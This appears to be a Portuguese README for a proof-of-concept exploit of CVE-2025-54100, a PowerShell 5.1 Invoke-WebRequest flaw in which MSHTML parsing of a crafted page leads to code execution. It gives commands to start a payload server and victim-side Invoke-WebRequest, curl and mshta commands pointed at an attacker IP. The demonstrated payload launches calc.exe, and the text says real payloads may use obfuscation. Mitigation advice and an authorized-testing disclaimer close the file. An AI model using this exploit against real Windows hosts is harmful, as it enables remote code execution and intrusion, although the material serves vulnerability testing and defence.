
CVE-2025-54100 (CVSS 7.8 High) é uma vulnerabilidade de injeção de comandos no cmdlet Invoke-WebRequest do Windows PowerShell 5.1. Ela decorre da neutralização inadequada de elementos especiais durante a análise automática de respostas da Web.
Uma Prova de Conceito concisa que demonstra como CVE-2025-54100 pode levar à Execução Remota de Código (RCE) no Windows PowerShell 5.1 por meio da análise maliciosa de HTML.
Invoke-WebRequest quando não é usado -UseBasicParsingActiveXObject) no contexto do chamador.CVE-2025-54100.py serve um payload HTML especialmente criado.WScript.Shell / Shell.Application.calc.exe.python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
Inicie o servidor HTTP do PoC:
uvicorn app:app --host 0.0.0.0 --port 8888 --reload
Execute estes comandos em uma máquina Windows vulnerável sem -UseBasicParsing:
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888
Use a mesma porta que você configurou para o servidor. Se vulnerável, o script embutido é executado por meio do parser MSHTML. Alguns produtos de antivírus podem bloquear o comportamento mesmo que o problema de análise esteja presente.
Se o calc.exe não aparecer:
Invoke-WebRequest sem -UseBasicParsing.Isso demonstra o vetor de execução. Payloads do mundo real podem usar ofuscação ou bypass adicionais para contornar as restrições padrão.

A Microsoft corrigiu o problema em dezembro de 2025:
-UseBasicParsing para evitar a análise MSHTML:
Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
[!WARNING] Apenas para fins educacionais e testes autorizados. Use com responsabilidade e cumpra todas as leis aplicáveis. Os autores não se responsabilizam por uso indevido ou danos.